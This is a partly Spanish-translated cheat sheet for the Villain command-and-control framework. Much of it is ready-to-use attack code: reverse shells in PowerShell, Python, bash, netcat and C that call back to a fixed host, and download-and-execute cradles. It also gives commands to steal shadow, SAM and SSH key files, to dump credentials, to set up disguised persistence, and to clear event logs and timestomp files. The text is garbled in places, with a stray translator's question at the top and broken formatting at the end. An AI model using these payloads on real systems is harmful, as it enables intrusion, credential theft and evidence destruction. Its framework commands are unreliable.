Hoja de Referencia del Framework C2 Villain¶
Would you like me to proceed with translating the other sections as well? Please provide the specific text for each section.
Overview¶
Villain is a high-level stage 0/1 command and control (C2) framework designed for managing reverse shells and initial access operations. Built in Python, Villain focuses on simplicity and effectiveness for early-stage red team operations, providing an intuitive interface for managing multiple reverse shell connections, PowerShell operations, and multi-session control.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation¶
Prerequisites¶
# Install Python 3.8+ and pip
sudo apt update
sudo apt install -y python3 python3-pip python3-venv git
# Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
# Verify Python version
python3 --version
Installation from GitHub¶
# Clone Villain repository
git clone https://github.com/t3l3machus/Villain.git
cd Villain
# Create virtual environment
python3 -m venv villain-env
source villain-env/bin/activate
# Install requirements
pip install -r requirements.txt
# Make executable
chmod +x Villain.py
Docker Installation¶
# Clone repository
git clone https://github.com/t3l3machus/Villain.git
cd Villain
# Build Docker image
docker build -t villain .
# Run Villain container
docker run -it --rm -p 6969:6969 -p 8080:8080 villain
# Run with persistent data
docker run -it --rm -p 6969:6969 -p 8080:8080 -v $(pwd)/data:/app/data villain
Kali Linux Installation¶
# Install from Kali repositories (if available)
sudo apt update
sudo apt install villain
# Or install from source
git clone https://github.com/t3l3machus/Villain.git
cd Villain
pip3 install -r requirements.txt
Basic Usage¶
Starting Villain¶
# Start Villain with default settings
python3 Villain.py
# Start with custom interface and port
python3 Villain.py -i 0.0.0.0 -p 6969
# Start with SSL/TLS encryption
python3 Villain.py -i 0.0.0.0 -p 443 -c /path/to/cert.pem -k /path/to/key.pem
# Start with custom teamserver password
python3 Villain.py -x MySecretPassword
# Start in quiet mode
python3 Villain.py -q
Command Line Options¶
# Villain command line options
python3 Villain.py -h
Options:
-i, --interface Interface to bind the teamserver (default: 127.0.0.1)
-p, --port Port to bind the teamserver (default: 6969)
-x, --teamserver-password Set teamserver password
-c, --cert Path to SSL certificate file
-k, --key Path to SSL private key file
-q, --quiet Quiet mode (minimal output)
-h, --help Show help message
Web Interface Access¶
# Access Villain web interface
http://127.0.0.1:6969
# HTTPS access (if SSL configured)
https://your-domain.com:443
# Default credentials
# No authentication by default
# Use -x flag to set teamserver password
Core Features¶
Session Management¶
# List active sessions
sessions
# Select session
sessions -i [session_id]
# Session information
sessions -i [session_id] -info
# Kill session
sessions -i [session_id] -k
# Rename session
sessions -i [session_id] -n [new_name]
# Background current session
background
Listener Management¶
# Create HTTP listener
listeners -c http -p 8080
# Create HTTPS listener
listeners -c https -p 443 -c /path/to/cert.pem -k /path/to/key.pem
# Create reverse shell listener
listeners -c shell -p 4444
# List active listeners
listeners
# Kill listener
listeners -k [listener_id]
Payload Generation¶
# Generate PowerShell payload
generate -t powershell -l [listener_id]
# Generate Python payload
generate -t python -l [listener_id]
# Generate Bash payload
generate -t bash -l [listener_id]
# Generate Windows executable
generate -t exe -l [listener_id] -o payload.exe
# Generate with obfuscation
generate -t powershell -l [listener_id] -o
Reverse Shell Operations¶
Basic Shell Commands¶
# Execute system commands
shell whoami
shell hostname
shell pwd
shell ls -la
shell dir
# Change directory
cd /path/to/directory
cd C:\Windows\System32
# File operations
cat /etc/passwd
type C:\Windows\System32\drivers\etc\hosts
download /path/to/file
upload local_file remote_path
PowerShell Operations¶
# Execute PowerShell commands
powershell Get-Process
powershell Get-Service
powershell Get-ComputerInfo
powershell Get-LocalUser
powershell Get-LocalGroup
# PowerShell one-liners
powershell "Get-WmiObject -Class Win32_ComputerSystem"
powershell "Get-NetAdapter|Select-Object Name,InterfaceDescription,LinkSpeed"
powershell "Get-Process|Where-Object \\\\{$_.ProcessName -like '*chrome*'\\\\}"
# Execute PowerShell scripts
powershell -File C:\Scripts\script.ps1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/script.ps1')"
File Transfer Operations¶
# Download files from target
download C:\Users\Administrator\Documents\sensitive.docx
download /etc/shadow
download C:\Windows\System32\config\SAM
# Upload files to target
upload payload.exe C:\Windows\Temp\update.exe
upload script.sh /tmp/script.sh
upload tool.py C:\Users\Public\tool.py
# Bulk file operations
download C:\Users\*\Documents\*.docx
download /home/*/.ssh/id_rsa
Process Management¶
# List processes
ps
shell tasklist
powershell Get-Process
# Kill process
kill [pid]
shell taskkill /PID [pid] /F
powershell Stop-Process -Id [pid] -Force
# Start process
shell start notepad.exe
powershell Start-Process -FilePath "notepad.exe"
# Process injection
inject [pid] [shellcode_file]
Advanced Features¶
Multi-Session Management¶
# Interact with multiple sessions
sessions -a "whoami" # Execute on all sessions
sessions -g [group] "hostname" # Execute on session group
# Session grouping
sessions -i [session_id] -g [group_name]
# Broadcast commands
broadcast "systeminfo"
broadcast "Get-ComputerInfo"
# Session synchronization
sync [session_id1] [session_id2]
Persistence Mechanisms¶
# Registry persistence
persistence registry -k "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -v "WindowsUpdate" -p "C:\Windows\Temp\payload.exe"
# Scheduled task persistence
persistence schtask -n "SystemUpdate" -p "C:\Windows\Temp\payload.exe" -t "ONLOGON"
# Service persistence
persistence service -n "WindowsUpdateService" -p "C:\Windows\Temp\payload.exe"
# Startup folder persistence
persistence startup -p "C:\Windows\Temp\payload.exe"
Lateral Movement¶
# WMI execution
wmi [target_ip] [username] [password] "whoami"
wmi 192.168.1.100 administrator password123 "systeminfo"
# PSExec-style execution
psexec [target_ip] [username] [password] [command]
psexec 192.168.1.100 admin pass123 "powershell -c Get-Process"
# PowerShell remoting
winrm [target_ip] [username] [password] [command]
winrm 192.168.1.100 administrator password123 "Get-Service"
# SSH execution (Linux targets)
ssh [target_ip] [username] [password] [command]
ssh 192.168.1.50 root password123 "uname -a"
Credential Operations¶
# Dump credentials
creds dump
creds mimikatz
creds lsass
# Credential storage
creds add -u [username] -p [password] -d [domain] -h [hash]
# List stored credentials
creds list
# Use credentials
creds use [cred_id]
# Pass-the-hash
pth [username] [hash] [target] [command]
Network Operations¶
# Port scanning
portscan [target] [ports]
portscan 192.168.1.0/24 80,443,22,3389
# Network discovery
discover [network]
discover 192.168.1.0/24
# Proxy operations
proxy start [port]
proxy list
proxy stop [proxy_id]
# Tunneling
tunnel [local_port] [remote_host] [remote_port]
Generación y Despliegue de Payloads¶
Payloads de PowerShell¶
# Basic PowerShell reverse shell
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%\\\\{0\\\\};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\\\\{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1|Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
\\\\};
$client.Close()
# Obfuscated PowerShell payload
$s='192.168.1.100';$p=4444;$c=New-Object System.Net.Sockets.TCPClient($s,$p);$st=$c.GetStream();[byte[]]$b=0..65535|%\\\\{0\\\\};while(($i=$st.Read($b,0,$b.Length)) -ne 0)\\\\{$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($sb2);$st.Write($sb,0,$sb.Length);$st.Flush()\\\\};$c.Close()
# Base64 encoded payload
$command = "powershell -enc " + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Payloads de Python¶
#!/usr/bin/env python3
# Python reverse shell payload
import socket
import subprocess
import os
import sys
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.100', 4444))
while True:
command = s.recv(1024).decode('utf-8')
if command.lower() == 'exit':
break
if command.startswith('cd '):
try:
os.chdir(command[3:])
s.send(b'Changed directory\n')
except:
s.send(b'Failed to change directory\n')
else:
try:
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
s.send(output)
except:
s.send(b'Command failed\n')
s.close()
if __name__ == '__main__':
connect()
Payloads de Bash¶
#!/bin/bash
# Bash reverse shell payload
exec 5<>/dev/tcp/192.168.1.100/4444
cat <&5|while read line; do $line 2>&5 >&5; done
# Alternative bash payload
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
# Netcat payload
nc -e /bin/bash 192.168.1.100 4444
# Socat payload
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444
Payloads Binarios¶
// C reverse shell payload
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main() \\\\{
int sockfd;
struct sockaddr_in server_addr;
char buffer[1024];
sockfd = socket(AF_INET, SOCK_STREAM, 0);
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(4444);
server_addr.sin_addr.s_addr = inet_addr("192.168.1.100");
connect(sockfd, (struct sockaddr*)&server_addr, sizeof(server_addr));
dup2(sockfd, 0);
dup2(sockfd, 1);
dup2(sockfd, 2);
execve("/bin/bash", NULL, NULL);
return 0;
\\\\}
// Compile: gcc -o payload payload.c
Automatización y Scripting¶
Script de Automatización en Python¶
#!/usr/bin/env python3
# Villain automation script
import requests
import json
import time
import websocket
from threading import Thread
class VillainAPI:
def __init__(self, host='127.0.0.1', port=6969, password=None):
self.base_url = f"http://\\\\{host\\\\}:\\\\{port\\\\}"
self.session = requests.Session()
if password:
self.authenticate(password)
def authenticate(self, password):
"""Authenticate with teamserver"""
auth_data = \\\\{'password': password\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/auth", json=auth_data)
return response.status_code == 200
def get_sessions(self):
"""Get active sessions"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/sessions")
return response.json()
def execute_command(self, session_id, command):
"""Execute command on session"""
cmd_data = \\\\{
'session_id': session_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.json()
def upload_file(self, session_id, local_path, remote_path):
"""Upload file to session"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'session_id': session_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload",
files=files, data=data)
return response.json()
def download_file(self, session_id, remote_path, local_path):
"""Download file from session"""
data = \\\\{
'session_id': session_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def automated_recon(self, session_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps aux" if self.is_linux_session(session_id) else "tasklist",
"ifconfig" if self.is_linux_session(session_id) else "ipconfig /all",
"netstat -an",
"uname -a" if self.is_linux_session(session_id) else "systeminfo"
]
results = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(session_id, cmd)
results.append(result)
time.sleep(2)
return results
def is_linux_session(self, session_id):
"""Check if session is Linux-based"""
result = self.execute_command(session_id, "uname")
return 'Linux' in result.get('output', '')
def establish_persistence(self, session_id):
"""Establish persistence on target"""
if self.is_linux_session(session_id):
# Linux persistence
commands = [
"echo '*/5 * * * * /tmp/payload'|crontab -",
"echo '/tmp/payload' >> ~/.bashrc",
"cp /tmp/payload /etc/init.d/update && chmod +x /etc/init.d/update"
]
else:
# Windows persistence
commands = [
'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "WindowsUpdate" /d "C:\\Windows\\Temp\\payload.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\\Windows\\Temp\\payload.exe" /sc onlogon',
'sc create "WindowsUpdateService" binPath= "C:\\Windows\\Temp\\payload.exe" start= auto'
]
for cmd in commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(session_id, cmd)
time.sleep(3)
# Usage example
def main():
villain = VillainAPI('192.168.1.100', 6969, 'MySecretPassword')
# Get active sessions
sessions = villain.get_sessions()
print(f"[+] Found \\\\{len(sessions)\\\\} active sessions")
for session in sessions:
session_id = session['id']
print(f"[+] Processing session: \\\\{session_id\\\\}")
# Perform reconnaissance
villain.automated_recon(session_id)
# Establish persistence
villain.establish_persistence(session_id)
# Download interesting files
if villain.is_linux_session(session_id):
villain.download_file(session_id, '/etc/passwd', f'passwd_\\\\{session_id\\\\}.txt')
villain.download_file(session_id, '/etc/shadow', f'shadow_\\\\{session_id\\\\}.txt')
else:
villain.download_file(session_id, 'C:\\Windows\\System32\\config\\SAM', f'SAM_\\\\{session_id\\\\}')
if __name__ == "__main__":
main()
Automatización en PowerShell¶
# Villain PowerShell automation script
function Invoke-VillainAutomation \\\\{
param(
[string]$VillainServer = "192.168.1.100",
[int]$Port = 6969,
[string]$Password = $null
)
$baseUrl = "http://$VillainServer:$Port"
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate if password provided
if ($Password) \\\\{
$authData = @\\\\{ password = $Password \\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$baseUrl/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
\\\\}
# Get active sessions
try \\\\{
$sessionsResponse = Invoke-WebRequest -Uri "$baseUrl/api/sessions" -WebSession $session
$sessions = $sessionsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($sessions.Count) active sessions"
\\\\}
catch \\\\{
Write-Error "Failed to get sessions: $_"
return
\\\\}
# Process each session
foreach ($villainSession in $sessions) \\\\{
$sessionId = $villainSession.id
Write-Host "[+] Processing session: $sessionId"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
session_id = $sessionId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
$cmdResponse = Invoke-WebRequest -Uri "$baseUrl/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\payload.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onlogon'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
session_id = $sessionId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$baseUrl/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
\\\\}
\\\\}
# Execute automation
Invoke-VillainAutomation -VillainServer "192.168.1.100" -Password "MySecretPassword"
Script de Automatización en Bash¶
#!/bin/bash
# Villain bash automation script
VILLAIN_SERVER="192.168.1.100"
VILLAIN_PORT="6969"
PASSWORD="MySecretPassword"
BASE_URL="http://$VILLAIN_SERVER:$VILLAIN_PORT"
# Function to execute API calls
api_call() \\\\{
local method=$1
local endpoint=$2
local data=$3
if [ -n "$data" ]; then
curl -s -X $method "$BASE_URL$endpoint" \
-H "Content-Type: application/json" \
-d "$data" \
-b cookies.txt -c cookies.txt
else
curl -s -X $method "$BASE_URL$endpoint" \
-b cookies.txt -c cookies.txt
fi
\\\\}
# Authenticate
if [ -n "$PASSWORD" ]; then
echo "[+] Authenticating..."
auth_data="\\\\{\"password\":\"$PASSWORD\"\\\\}"
api_call "POST" "/auth" "$auth_data" > /dev/null
fi
# Get active sessions
echo "[+] Getting active sessions..."
sessions=$(api_call "GET" "/api/sessions")
session_count=$(echo "$sessions"|jq length)
echo "[+] Found $session_count active sessions"
# Process each session
echo "$sessions"|jq -r '.[].id'|while read session_id; do
echo "[+] Processing session: $session_id"
# Reconnaissance commands
commands=("whoami" "hostname" "systeminfo" "tasklist" "ipconfig /all" "netstat -an")
for cmd in "$\\\\{commands[@]\\\\}"; do
echo "[+] Executing: $cmd"
cmd_data="\\\\{\"session_id\":\"$session_id\",\"command\":\"$cmd\"\\\\}"
api_call "POST" "/api/execute" "$cmd_data" > /dev/null
sleep 2
done
# Establish persistence
persistence_commands=(
'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "WindowsUpdate" /d "C:\\Windows\\Temp\\payload.exe"'
'schtasks /create /tn "SystemUpdate" /tr "C:\\Windows\\Temp\\payload.exe" /sc onlogon'
)
for cmd in "$\\\\{persistence_commands[@]\\\\}"; do
echo "[+] Establishing persistence: $cmd"
cmd_data="\\\\{\"session_id\":\"$session_id\",\"command\":\"$cmd\"\\\\}"
api_call "POST" "/api/execute" "$cmd_data" > /dev/null
sleep 3
done
done
# Cleanup
rm -f cookies.txt
echo "[+] Automation completed"
Integración con Otras Herramientas¶
Integración con Metasploit¶
# Use Villain for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Villain session
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
shell C:\Windows\Temp\update.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Integración con Empire¶
# Generate Empire stager
# Use Villain for initial access, pivot to Empire
# From Villain session
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Integración con Cobalt Strike¶
# Beacon integration
# Generate Cobalt Strike beacon
# Use Villain for initial access, pivot to Beacon
# From Villain session
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Seguridad Operacional¶
Seguridad de Comunicaciones¶
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start Villain with SSL
python3 Villain.py -i 0.0.0.0 -p 443 -c server.crt -k server.key
Ofuscación de Tráfico¶
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated payload
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& \\\\{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('https://legitimate-domain.com/update.ps1')\\\\}"
Anti-Forense¶
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
# Timestomping
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Resolución de Problemas¶
Problemas Comunes¶
# Session not connecting
1. Check firewall rules
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# Python dependency issues
pip install --upgrade -r requirements.txt
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Modo de Depuración¶
# Enable verbose logging
python3 Villain.py -v
# Check network connectivity
telnet 192.168.1.100 6969
# Test payload execution
python3 -c "import socket; s=socket.socket(); s.connect(('192.168.1.100', 4444))"
Mejores Prácticas¶
Planificación Operacional```bash¶
Secure deployment¶
Use strong teamserver passwords¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Session management¶
Use unique session identifiers¶
Implement session timeouts¶
Regular session rotation¶
Secure communication channels¶
**Configuración previa al compromiso**: Configurar listeners y payloads antes del compromisobash
Operation documentation¶
Maintain session logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```Gestión de sesiones: Usar nombres de sesión descriptivos y agrupaciónhttps://github.com/t3l3machus/Villain**Protocolos de comunicación**: Establecer canales de comunicación C2 seguroshttps://github.com/t3l3machus/Villain/wiki**Manejo de datos**: Implementar recopilación y almacenamiento de datos seguroshttps://redteam.guide/[MITRE ATT&CK Framework] https://attack.mitre.org/[SANS Red Team Operations] https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/Esta hoja de referencia proporciona una referencia completa para usar el framework Villain C2. Asegúrese siempre de tener la autorización adecuada antes de realizar operaciones de red team o pruebas de penetración.